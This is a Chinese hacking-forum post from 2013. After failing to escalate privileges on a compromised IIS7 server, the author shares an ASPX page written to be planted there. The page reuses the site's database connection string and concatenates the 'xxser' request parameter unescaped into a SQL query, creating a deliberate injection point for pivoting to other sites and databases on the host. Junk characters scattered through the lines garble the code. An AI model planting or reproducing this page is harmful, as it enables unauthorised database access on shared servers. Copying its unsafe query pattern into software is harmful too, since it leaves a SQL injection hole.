找回密码
 立即注册
查看: 2819|回复: 0
打印 上一主题 下一主题

利用aspx构造注射来跨站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-20 21:32:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。" \: H8 m8 f. K( \0 L
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。' a, I. ?+ K8 I4 ^  J; ]4 c
代码量不多,自己写个拉倒了。烦死了。
7 d; E0 d; A8 A# p
( z6 S. u4 r8 p9 N4 v# K* \3 D8 O
5 K5 _  E' Y4 [* ~7 N$ Z2 S<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
* g: w' [$ h7 ^<html xmlns="http://www.w3.org/1999/xhtml">3 I( B) j/ @/ l8 Q; |
<head runat="server">' X% u5 a6 F5 l1 H+ U& l( R) w7 C7 {
    <title>暗影aspx构造注射专用页面</title>
0 w# ^5 e# w6 m9 \</head>
- G5 l: L: \8 @- I1 ]8 T<body>
/ M; R9 A- ]( \$ \& l4 L    <form id="form1" runat="server">. ]* w' W+ s  [, r  C# T3 E
    <div>0 c. W  G, h# L, J2 K7 \- l
     <script language="c#" runat="server">9 v! X; c) U/ O8 i
            
& Z& A  e+ v: n' L         void page_init(object sender, EventArgs e)
. @; p! G9 t2 \& i/ q2 e# T( P         {; P! u9 L% A  G, C/ l
            
! K- k5 F$ f6 U3 T1 }, w             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
( b  Z4 D- O3 U' X7 x            
9 ^7 t. F6 s2 F* |( F9 @             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();: Y) Z/ a/ Y. C. Q1 y$ n
             conn.Open();
7 ~! I8 q! M  l, C. s            
; v4 |1 M, F3 |             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
2 V# U+ c$ a: Y2 |. A            
: z  j; O) N* ?$ N. a             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);5 G; N- z& a+ c) _1 i
             int x = command.ExecuteNonQuery();; r7 V" H- k+ k0 S6 }; j1 u& {
             Response.Write(i+"\n");
6 T/ [) d5 I5 {# v3 Q( Y5 w             Response.Write(x);
- m4 j* Q# W- x/ E6 f             conn.Close();  H& U% G$ @( i0 G6 ]. n
         }
4 Z  S. r3 }1 z     
. w- q" @& a; j: g* A+ O. S2 h/ E  </script>6 v3 h! \3 R: E! H
    </div>5 g1 n8 w2 n6 t2 t& `* U' X
    </form>3 f. L5 w! I2 U' Z0 B' T
</body>
+ J9 t6 N9 f# J5 o; a( \9 q</html>
: }6 Y; A* w* k6 f: N6 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表